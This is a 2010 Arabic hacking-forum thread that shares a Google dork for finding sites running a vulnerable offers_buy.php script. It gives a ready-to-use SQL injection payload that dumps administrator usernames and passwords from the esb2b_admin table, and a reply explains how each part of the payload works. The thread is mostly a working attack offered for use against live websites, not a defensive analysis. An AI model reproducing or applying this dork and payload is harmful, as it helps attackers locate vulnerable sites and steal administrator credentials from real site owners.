:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)
-   -   دورك جديد ومواقع مصابة بالهبل (http://www.vbspiders.com/vb/t28659.html)

D.r-HACKz 05-02-2010 07:03 PM

دورك جديد ومواقع مصابة بالهبل
 
مرحبا بكم في اول موضوع لي في منتدى
بمناسبة مبروك علينا ستايل الجديد
هدا هو دروك
كود PHP:

allinurl:offers_buy.php?id

استغلال
كود PHP:

-9999+union+all+select+0,0,group_concat(es_admin_name,char(58),es_pwd)v3n0m,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+esb2b_admin-- 


هكر الجوف 05-02-2010 07:12 PM

كفوو :P


نبي له شرح لاهنت

D.r-HACKz 05-02-2010 07:17 PM

اخي كل شئ سهل اخي

مستر داتا بيز 05-03-2010 04:37 AM

اسم الملف المصاب
allinurl:offers_buy.php
اسم المتغير
id=9999-
الاستغلال هو
الكتابه ع الماس

+union+all+select+

اما هذا
group_concat(es_admin_name,char(58),es_pwd)
ف Group_concat()
هوا الامر المستخدم للاستعلام عن عمودين او ثلاثه او اكتر اما
es_admin_name,char(58)
فهو جدول اليوزر
اما عمود اليوزر فهو
es_pwd
معنى الاصفر الى فى الاستخدام
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
المفروض انها الاعمدة المصابه
اما هذا
esb2b_admin
فهذا هو الجدول الرئيسى الذى يحوي عمود الباسوردات وعمود اليوزرات
الى هما

es_admin_name
و
es_pwd
اما From
فهذا كود الاستعلام الاولى للجدول حسب شرح الاخ فولكانو فى الدورة

تحياتى وسلمت يمناك على الاستغلال اخى الكريم


الساعة الآن 11:38 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0